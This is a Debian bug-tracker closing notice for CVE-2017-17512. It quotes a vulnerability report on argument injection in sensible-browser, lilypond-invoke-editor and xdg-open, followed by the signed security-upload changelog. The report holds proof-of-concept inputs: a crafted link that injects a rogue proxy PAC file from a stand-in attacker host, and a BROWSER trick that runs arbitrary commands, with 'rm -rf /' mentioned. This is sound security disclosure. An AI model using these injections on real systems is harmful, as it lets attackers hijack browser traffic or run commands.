Your message dated Sun, 24 Dec 2017 13:06:25 +0000 with message-id <e1et5yz-0006vp...@fasolo.debian.org> and subject line Bug#881767: fixed in sensible-utils 0.0.9+deb9u1 has caused the Debian Bug report #881767, regarding sensible-utils: CVE-2017-17512: Argument injection in sensible-browser to be marked as done.
This means that you claim that the problem has been dealt with. If this is not the case it is now your responsibility to reopen the Bug report if necessary, and/or fix the problem forthwith. (NB: If you are a system administrator and have no idea what this message is talking about, this may indicate a serious mail system misconfiguration somewhere. Please contact ow...@bugs.debian.org immediately.) -- 881767: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=881767 Debian Bug Tracking System Contact ow...@bugs.debian.org with problems
--- Begin Message ---Package: sensible-utils Version: 0.0.10 Severity: grave Tags: security Justification: user security hole When the BROWSER environment variable is set, an invalid URI can be used to inject arguments in sensible-browser. Description =========== When BROWSER is set, sensible-browser calls the actual browser with: ~~~sh cmd=$(printf "$i\n" "$URL") $cmd && exit 0 ~~~ If a IFS character is in $URL, this leads to the injection of extra arguments when calling the actual browser. For example, this commands triggers the incognito mode of Chromium: ~~~sh BROWSER=chromium sensible-browser "http://www.example.com/ --incognito ~~~ This URI is invalid but if the caller does not properly validate the URI, an attacker could add extra arguments when calling the browser. For example, Emacs might call sensible-browser with an invalid URI. With this configuration: ~~~elisp (setq browse-url-browser-function (quote browse-url-generic)) (setq browse-url-generic-program "sensible-browser") ~~~ an org-mode file like this one: ~~~org [[http://www.yahoo.fr --incognito][test]] ~~~ will trigger the incognito mode of Chromium (this does not happen with org-mode 8.2.10 shipped in the emacs25 package but it does happen using org-mode 9.1.2 shipped in the elpa-org package). While this particular example is not very dangerous other arguments can be more harmful. For example, it is possible to inject an argument which overrides the proxy configuration (with a PAC file). This org-mode link launches Chromium with an alternative PAC file (silently): ~~~org [[http://www.example.com/ --proxy-pac-file=http://dangerous.example.com/proxy.pac][test]] ~~~ An attacker could use this type of URI, to forward all the traffic coming from the browser to a server he's controlling. Possibles fixes =============== * A simple fix, would be for sensible-browser to actually check that the URI parameter does not contain any IFS character (which are not valid in URI or IRI and fail if it does). It should probably add extra verification (such as checking that the argument does not begin by a dash). * Another solution would be to escape IFS characters. * The simpler fix would probably to drop support for "%s" in the BROWSER string: this feature is not supported by other programs anyway. This is "Alternative Secure BROWSER Definition" in [1]. * Or we could implement "Compatible Secure BROWSER Definition" from [1] but it may not be very convenient to do in shell. Moreover, we should probably add some basic URI validation in order to reject things like: ~~~sh BROWSER=chromium sensible-browser "--incognito" ~~~ Additional problems =================== sensible-browser does not handle empty browser in the BROWSER environment variable: ~~~sh BROWSER=":chromium" sensible-browser "xterm" ~~~ This command runs xterm (we could have used "rm -rf /"). Similar vulnerabilities in other packages ========================================= * lilypond lilypond-invoke-editor is vulnerable to the same argument injection [2]: ~~~sh BROWSER="chromium" lilypond-invoke-editor "http://www.example.com/ --incognito" ~~~ Lilypond suggests using it as URI handler [3]: > When this functionality is active, LilyPond adds hyperlinks to the > PDF file. These hyperlinks are sent to a ‘URI helper’ > or a web-browser, which opens a text-editor with the cursor in > the right place. > > To make this chain work, you should configure your PDF viewer > to follow hyperlinks using the ‘lilypond-invoke-editor’ > script supplied with LilyPond. > > The program ‘lilypond-invoke-editor’ is a small helper program. > It will invoke an editor for the special textedit URIs, and run > a web browser for others. [...] * xdg-open xdg-open's 'envvar' implementation (open_envvar) has this same problem when '%s' is present in $BROWSER: # Triggers incognito mode: BROWSER="chromium %s" xdg-open "http://www.example.com/ --incognito" # Does not trigger incognito mode: BROWSER="chromium" xdg-open "http://www.example.com/ --incognito" References ========== [1] https://www.dwheeler.com/browse/secure_browser.html [2] http://sources.debian.net/src/lilypond/2.18.2-9/scripts/lilypond-invoke-editor.scm/#L129 [3] http://lilypond.org/doc/v2.18/Documentation/usage/configuring-the-system-for-point-and-click [4] https://specifications.freedesktop.org/desktop-entry-spec/1.1/ar01s06.html Thanks to Bastien Roucaries for some material and references. -- System Information: Debian Release: buster/sid APT prefers testing APT policy: (500, 'testing'), (500, 'stable'), (90, 'unstable'), (1, 'experimental') Architecture: amd64 (x86_64) Foreign Architectures: i386 Kernel: Linux 4.13.0-1-amd64 (SMP w/4 CPU cores) Locale: LANG=fr_FR.utf8, LC_CTYPE=fr_FR.utf8 (charmap=UTF-8), LANGUAGE=fr_FR.utf8 (charmap=UTF-8) Shell: /bin/sh linked to /bin/dash Init: systemd (via /run/systemd/system) -- no debconf information
--- End Message ---
--- Begin Message ---Source: sensible-utils Source-Version: 0.0.9+deb9u1 We believe that the bug you reported is fixed in the latest version of sensible-utils, which is due to be installed in the Debian FTP archive. A summary of the changes between this version and the previous one is attached. Thank you for reporting the bug, which will now be closed. If you have further comments please address them to 881...@bugs.debian.org, and the maintainer will reopen the bug report if appropriate. Debian distribution maintenance software pp. Salvatore Bonaccorso <car...@debian.org> (supplier of updated sensible-utils package) (This message was generated automatically at their request; if you believe that there is a problem with it please contact the archive administrators by mailing ftpmas...@ftp-master.debian.org) -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 Format: 1.8 Date: Wed, 20 Dec 2017 14:39:04 +0100 Source: sensible-utils Binary: sensible-utils Architecture: source Version: 0.0.9+deb9u1 Distribution: stretch-security Urgency: high Maintainer: Anibal Monsalve Salazar <ani...@debian.org> Changed-By: Salvatore Bonaccorso <car...@debian.org> Closes: 881767 Description: sensible-utils - Utilities for sensible alternative selection Changes: sensible-utils (0.0.9+deb9u1) stretch-security; urgency=high . * Non-maintainer upload by the Security Team. * Argument injection in sensible-browser (CVE-2017-17512) Thanks to Gabriel Corona (Closes: #881767) Checksums-Sha1: fad73d699e28bddd1cfb5b77d1a299274e66d091 1590 sensible-utils_0.0.9+deb9u1.dsc a41cadb8acad1ac29bc376183a6ccc24d89a489f 53564 sensible-utils_0.0.9+deb9u1.tar.xz Checksums-Sha256: 93641a0b5bb3b24b6f01daaf6d99cc1221678b150f19fc8a5c603cacdaecd6e2 1590 sensible-utils_0.0.9+deb9u1.dsc 103a4666ddad53452b849d20c2509a6356d9aa6a60c515df9983bd0ca897a3db 53564 sensible-utils_0.0.9+deb9u1.tar.xz Files: da0fa8e20cb26776a95ba9a5d93b18a0 1590 utils required sensible-utils_0.0.9+deb9u1.dsc 87f73f5f1a138448303fca9ed0d6060f 53564 utils required sensible-utils_0.0.9+deb9u1.tar.xz -----BEGIN PGP SIGNATURE----- iQKmBAEBCgCQFiEERkRAmAjBceBVMd3uBUy48xNDz0QFAlo6kMRfFIAAAAAALgAo aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldDQ2 NDQ0MDk4MDhDMTcxRTA1NTMxRERFRTA1NENCOEYzMTM0M0NGNDQSHGNhcm5pbEBk ZWJpYW4ub3JnAAoJEAVMuPMTQ89EL8MQAJn4b6X2CyFpzAJ72psa1cz7HrIVOsia Zw96r4LJxB1NNWJ9bF/JPdvjToKn2jltZGnyq6TAxYEdoIPJ9SW3A5H3T0idWXBY RVxR37CohRZiiGnku/W/pzBjyak5ZBv33u8tOqL1mFtRY5dzLt6/EnUCzGMRm8Te tR5kgjB93EVJe1MRabAZEYYN7frVh4QSnN4u1hULf337mElKvMCDeGh/Mb0uFY5Y ELkNQA8DHOQKzr0fLH8H664tDWaknAGeHuEqlLEDRR3KxOF0oWQCcPYB6lgFZ5w6 vLMl3MTQI3LQ3oqMfoBonfD+K7c2L2VzoJgjriZ+433yZ6WL330uL03s5UPKgiDc H0fV49M6eLh8Gt1aahvUo/LmnQVXuKQvXhd5T+aVWD1DMhpfopruxImJ2CBzUgU1 dYQ71lqXp+LXkuIkxboGCb2krlBOsUVMTf1ZGPyE7OC7XWCi6w3VtWc/KgN0ml9/ 1lTjfgNv2+5lh/FbFAaggfd99Yy6n+OhrTrzi2ZX9N8LUvIXBKHcUUJ7wxU3Hnj/ u6ITFgGOlep8fIDobx07QMhKl9TapNEFWygI2SVXNV7CoesWwjXVF/K6/tznd3eo s4z9wlC7OgDFLN8csfH3dEdtJqknlRaLnPAcoR9JB8nwtKgEVvID8BhOknPWOfaj YwC1bsFhQTwm =aWtE -----END PGP SIGNATURE-----
--- End Message ---
